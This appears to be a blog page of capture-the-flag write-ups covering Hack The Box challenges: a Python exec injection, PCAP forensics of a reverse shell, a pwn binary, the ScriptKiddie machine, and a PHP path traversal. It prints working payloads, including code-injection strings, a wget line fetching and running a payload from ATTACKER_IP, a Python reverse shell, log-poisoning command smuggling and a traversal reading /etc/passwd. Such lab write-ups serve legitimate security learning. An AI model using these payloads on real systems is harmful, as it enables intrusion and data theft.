Hack The Boo

Hack The Boo was a Halloween themed CTF from Hack The Box. I could only dedicate a few hours to this, but still managed to solve 3 machines. Below is a quick writeup on the machines I did:

Evaluation Deck

First off, I downloaded the supplied files from the CTF site

/conf/supervisord.conf shows that we will be running /app/run.py using Flask, a web framework.

In the run.py file, we import and run the app function within application/main

From this file, we now import 2 functions (web and api) from application/blueprints/routes, which are hosted at / and /api respectively.

Finally, we find the vulnerable function. We can POST JSON data to the /get_health URL, which ultimately is passed through exec to perform a calculation on line 28.

We can see that we need to provide 3 values: current_health, attack_power and operator. On line 27, current_health and attack_power are cast to ints, so we will abuse the operator value to inject code.

I will spin up a VM and intercept a request using Burp Suite & FoxyProxy. We can see that when we click on a card in the UI, it will make a POST request to get_health.

I will send this request to Repeater, so we can modify the request. My initial thought here was that we could insert a command into the middle of the request and concatenate our current_health and attack_power variables to the end. For example, using the values above it would result in an output along the lines of 100CommandOutput22.

After running the code locally, it became apparent that this wouldn’t be possible due to us attempting to concatenate a string to an integer. Therefore I looked a little deeper, and saw the response function was taking the result value of the output and returning it as a response. We can abuse this by setting our own value to the response variable. We will do this by supplying an operator value of ‘; result = ‘. We can see below that we are effectively generating a JSON response of “result = 123; result = 456″. The server then returns the 456 value.

Now we can control the output, we will import os.popen to run system commands and leverage this vulnerability into an RCE. Using os.system here will run the command, but the returned value is the exit code of the process – not the output of the command!

We now need to import and run a function in one line. Typically in Python we would import our libraries such as ‘os‘ at the top of the file and call the later, but we don’t have that luxury here!

To do this, we will use the __import__ function. I always forget the structure of this, but SethSec had it on their blog:

__import__('os').popen(r'COMMAND').read()

Putting this all together, we have the following value for ‘operator’:

; result = __import__('os').popen('whoami').read(); a =

We will run this against the box:

By running some basic commands, we can see that the flag is in the parent directory to where we are being executed from.

And we have our flag, using the operator parameter of:

; result = __import__('os').popen('cat ../flag.txt').read(); a =

Wrong Spooky Season

This was the first forensics challenge to be released, with only a single PCAP file provided. I loaded this into WireShark and could see that the file contained HTTP traffic which immidiately grabbed my attention due to it being in plaintext.

Scrolling through the results, we can see there is some seriously suspicious looking requests!

This final GET request appears to be the point at which the ‘attackers’ established a form of reverse shell using Socat. If we sort by frame number, we can see a session is created and then the subsequent frames contain the communication between the attacker and the server.

If we right click on frame 466, we can then select Follow -> Follow TCP Stream to investigate the traffic further. This confirms my suspicion that this is a reverse shell, as we see common enumeration commands being run:

At the end of this output we can see a string which caught my attention. The double equals sign makes me think it is likely base64 encoded. This value is piped into ‘rev‘, so it is likely to be reversed as well.

Using CyberChef to reverse and decode this, we can reveal the flag!

Pumpkin Stand

This challenge was very frustrating for me, as I do not normally do the pwn or reversing challenges! I very much went down the wrong route here, but I figured it would be worth including it anyway.

First off, we have some files we can download locally, and a docker instance. The docker instance shows the command line output of a program.

Inspecting the files, we have an ELF executable

Which when we run it, we are prompted with the same output as the website

I tried running ‘strings pumpkin_stand‘, which suggests that the binary is reading from the flag.txt file.

At this point, I figured the solution was likely to revolve around debugging the program and manipulating it into revealing the flag. My initial ideas revolved around altering the pumpcoins variable which dictates the number of coins we have available to spend.

To do this, I loaded the binary in GDB and dug into it. Some commands of use were:

CommandUsage
b *function_nameSet a breakpoint on the ‘function_name’ function
disassShow current call stack
info break (i b)Show all break points
del [breakpoint_number]Remove a breakpoint
set {int} 0x12345678 = 10000Set a variable

Continuing with my idea of modifying the number of coins we have, I set the pumpcoin value to 10000 using set {int} 0x555555602018 = 10000

After removing my breakpoint and resuming, we can see we now have 10000 coins!

I purchased the laser, but it did not reveal the flag for me. I then attempted all manner of different combinations but couldn’t make any progress.

After stepping away from the challenge and speaking with a colleague, I realised that I should have focused more on the Docker container! We could connect to the docker container over a plaintext socket. When we had connected to this, we could simply enter in incorrect values and the binary would not catch the error and instead show the flag.

I believe a successful combination was to buy item ‘3’, which would not be handled correctly.

Summary

Overall, Hack The Boo was another excellent CTF organised by HackTheBox. Hopefully next time I will be able to dedicate more time to it and try to get a bit higher up the leaderboard!

HackTheBox ScriptKiddie Walkthough

ScriptKiddie was an Easy rated Linux machine, which involved exploiting a vulnerability within MetaSploit, then gaining access to the pwn user and abusing a sudo misconfiguration.

Getting A Shell

Reconnisance

Initial nMap scans showed a very simple box, with just SSH and port 5000 open. I personally find the -sV -A flags tend to reveal the most useful information when scanning. The scan shows that port 5000 is most likely a Python-based webserver.

Machine generated alternative text:
(kali@ kali) - 
$ nmap -sv -A 
10.129.131.144 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-16 11:26 BST 
Nmap scan report for 10.129.131.144 
Host is up (0.043s latency). 
Not shown: 998 closed ports 
PORT 
STATE SERVICE VERSION 
22/tcp 
OpenSSH 8.2p1 Ubuntu 4ubuntuø.1 (Ubuntu Linux; 
open ssh 
1 2.0) 
ssh-hostkey: 
3072 (RSA) 
256 (ECDSA) 
256 (ED25519) 
5000/tcp open http 
Werkzeug httpd 0.16.1 (python 3.8.5) 
http-server-header: Werkzeug/ø.16.1 python/3.8.5 
http-title: kld'5 h4ck3r tøø15 
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 
protoco 
Service detection performed. Please report any incorrect results at https://n 
map.org/submit/ 
Nmap done: 1 IP address (1 host up) scanned in 10.37 seconds
Scan results for the target

The site itself is an ‘script-kiddies’ website, allowing for nMap, SearchSploit and MetaSploit to be used from a web portal. Initially, I thought this might be an OS command injection vulnerability. Perhaps this could work by running an nMap scan along the lines of “8.8.8.8 & whoami“. This didnt work though, showing there was likely something further to be exploited.

Machine generated alternative text:
nmap 
scan top 100 ports on an ip 
ip: 
8.8.8.8 whoami 
scan
My attempt at performing OS injection

MetaSploit

Two things in the MetaSploit section caught my eye. First, you are able to include a template file – something I didn’t even know you could do in MetaSploit! Secondly, ‘Android’ was listed as a target, along with Windows and Linux. This seemed very odd, and led me to discover a CVE (CVE-2020-7384) relating to MetaSploit, template files and Android!

Luckily, there is exploit code for this within ExploitDB. This exploit will generate a malicious template, which will be executed on the target. To make my life easier, I decided to make this template retrieve a file from my HTTP server. This means I wont need to recompile the template for any small code tweaks – I can just update the file on my webserver. To do this, I changed the payload variable to be the following code:

payload = 'wget "http://ATTACKER_IP/payload" -O /tmp/payload && chmod +x /tmp/payload && ./tmp/payload'

This code will download a ‘payload‘ file from my HTTP server, make it executable and then execute it.

Now I could begin to create my payload. At this point I had several issues with Kali not finding the jarsigner binary. This is caused by using JRE (Java Runtime Environment) and not JDK (Java Development Kit). To fix this, run sudo apt install -y default-jdk to install JDK (Source).

Successfully compiling the malicious template file.

I then opted to use a basic Python3 reverse shell as our payload file. This then returned a shell from the host after specifying our IP in the LHOST field.

payloads 
venom it up 
. gen rev tcp meterpreter bins 
I host: 
template file (optional): 
template.apk
Setting LHOST and the template!
'r.•lp 
8888 
listening on [any] 8888 
connect to [10.10.14.67] from 
/bin/sh: e: can't access ttv; 
(UNKNOWN) [10.129.131.144] 
job control turned off 
33662 
(katiSkaIi)-C 
total 
-rwxr-xr-x I kali kali 1830 Apr 
10.10.14.67 
tsudol password for kali: 
serving HTTP on ø.ø.e.ø port se 
16 12. 
•29 49491.py 
(http• 
12 : 35. 
10.129.131.1&0 - 
10.129.131.1" 
- [16/Apr/2e21 
[16/Apr/2021 
- [16/Apr/2ø21 
.//e.ø.ø.ø:8ø/) . 
•GET 'payload HTTP/I.I• 2øø 
•GET 'payload HTTP/1 1 
•GET 'payload HTTP/I.I 
. • 200 
• 2øø
Shell returned from the server!

Privilege Escalation

At this point, we had access as the kid user, who unfortunately didn’t have the user flag in their directory! I moved LinuxSmartEnumeration onto the host and ran it initially on level 0, then on level 2 with specific flags.

Machine generated alternative text:
LSE Version: 
User: 
user ID: 
Password: 
Home : 
Path: 
umask: 
Hostname : 
Linux: 
Distribution : 
Architecture: 
./lse.sh -1 2 -p 0 -s 
If you know the current user password, write it here to check sudo privileges: 
-rw-r r 
3.1 
kid 
1000 
none 
/home/kid 
/var/lib/gems/2.7. ø/bin : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /snap/bin 
0022 
scriptkiddie 
5.4 .0-65-generic 
Ubuntu 20.04.1 LTS 
x86 64 
( users ) 
Are there other users in an administrative groups? 
usr020 
• 4: syslog 
adm 
kid 
pwn 
usr030 
fst090 
fst150 
Other users with shell 
root: /root :/bin/bash 
: 1000 : kid : /home/kid : /bin/bash 
:: /home/pwn : /bin/bash 
( file system ) 
SSH files in home directories. 
1 kid kid 0 Apr 16 11:41 /home/kid/.ssh/authorized_keys 
Looking for GIT/SVN repositories. 
/opt/exploit-database/ . git 
/opt/exploitdb/ .git 
kidnscriptkiddie : /tmp$ 
FINISHED )
Output of LSE, showing the pwn user.

I then moved to the kid users home directory, uploading my SSH key to gain a fully interactive shell as the kid user. Looking through the pwn users directory, the scanlosers.sh file stands out as being an area to target.

The scanlosers.sh file

In short, this file is reading in the hackers log file, then splitting it on any spaces using cut. Anything after the 2nd space (3rd item) is then put into the shell command on line 7, which is running an nMap scan. For instance, if we ran the following command it would poison the logs, then run whoami as the pwn user. Note that the semi-colon will end the nMap command and run whoami by itself.

echo "a a ; whoami" > /home/kid/logs/hackers && ./scanlosers.sh

We can then extend this to run a reverse shell, allowing us to gain code execution as the pwn user. I found the exploit code would often fail when combining the log poisoning and reverse shell, so I stored the shell in a separate file. To do this, I ran the following command to make a reverse shell file named ‘script.sh‘.

echo "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.67\",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" > script.sh

I then ran the following command to poison the logs.

echo "a a ; cd /home/kid/ && ./script.sh ;"> logs/hackers

Then run the scanlosers.sh file and you finally get a user shell!

Getting root

The first thing when I get a Linux shell, is to run sudo -l, as it is often an easy priv-esc! In this case, we can run MSFConsole as sudo, as shown below.

p 9999 
listening on (any] 9999 . 
connect to [le.10.14.671 from (UNKNOWN) [1ø.129.131.144] 48124 
/bin/sh: o: can't access tty; job control turned off 
$ whoami 
$ python3 —c ' import Pty; 
pwnascriptkiddie:/home/kid$ sudo -1 
sudo -I 
Matching Defaults entries for pm on scriptkiddie: 
env_reset, mail_badpass, 
/usr/locat/bin\ : /usr/sbin\ /usr/bin\ /sbin\ : /bin\ : /snap/bin 
User pm may run the following cMnands on scriptkiddie: 
(root) NOPASSWD: /opt/metasp10it-framework-6.ø.9/msfcons01e 
1 
pwnOscriptkiddie : / home/ kid$
Output of sudo -l for the pwn user.

Running MSFConsole as sudo allows us to run commands on the host as root. Ensure that you run the command exactly as shown in the screenshot above, don’t try to just run msfconsole as it might not work!

In the spirit of OSCP, we can get a root shell by uploading another Python3 reverse shell. We can then run that from within MSFConsole and get a root shell back.

msf6 > cd /home/kid 
cd /home/kid 
ms.f.$ bash script.sh 
bash script. sh 
[i] exec: bash script.sh 
kali@ kali 
nc -nvlp 
7777 
listening on [any] 7777 
connect to [10.10.14.671 from (UNKNOWN) [le.129.131.144J 53892 
whoani
A root reverse shell!

ScriptKiddie Summary

Overall, I really enjoyed ScriptKiddie as it had a very different focus to most other HTB boxes. The inclusion of having to move to the pwn user was a nice challenge as well! I would say this is fairly similar to machines in OSCP or Proving Grounds, so would be good practise ahead of the exam!

HTB CTF 2021 – MiniSTRyplace Writeup

MiniSTRyplace was a 1-star rated ‘Web’ challenge from the HackTheBox Cyber Apocalypse CTF. The solution was pretty simple, with a vulnerable str_replace function allowing for a simple path traversal exploit.

Initially, the files for the server were supplied as part of the challenge. From a quick initial search, the index.php file stood out as being interesting due to its logic for including various PHP files within the main webpage of the site.

The vulnerable function

Looking at the code, the server will include a file from within the pages/ directory, based on the lang parameter when passed as a GET request. Typically this would be via a request such as vulnerable_site.com/index.php?lang=en.php or similar. The function will then replace any occurrences of ../ with a blank string. From a brief glance, this appears to be alright, but if an attacker uses a a string such as ....//, PHP will remove the central ../ (i.e. ....// ), leaving a final string of ../, allowing for path traversal.

We can test this exploit by using a URL such as: vulnerable_site.com/?lang=qw.php….//….//….//….//….//….//etc/passwd, which returns the contents of the passwd file as shown below.

Contents of the passwd file returned by the server, indicating we have LFI capabilities
Contents of the passwd file returned by the server, indicating we have LFI capabilities

Looking at the Dockerfile, we know that the flag is copied to the root directory, so we can simply traverse up to the root folder, and then load the flag file. As shown below, this reveals a flag of CHTB{b4d_4li3n_pr0gr4m1ng} for MiniSTRyplace!

To learn more about this, HackTheBox have a really good Academy article which covers a range of methods for identifying and exploiting LFI vulnerabilities. These commonly come up in CTFs and OSCP boxes, so it is a good skill to get comfortable with!

If you enjoyed this writeup, I have written up several other boxes at this link.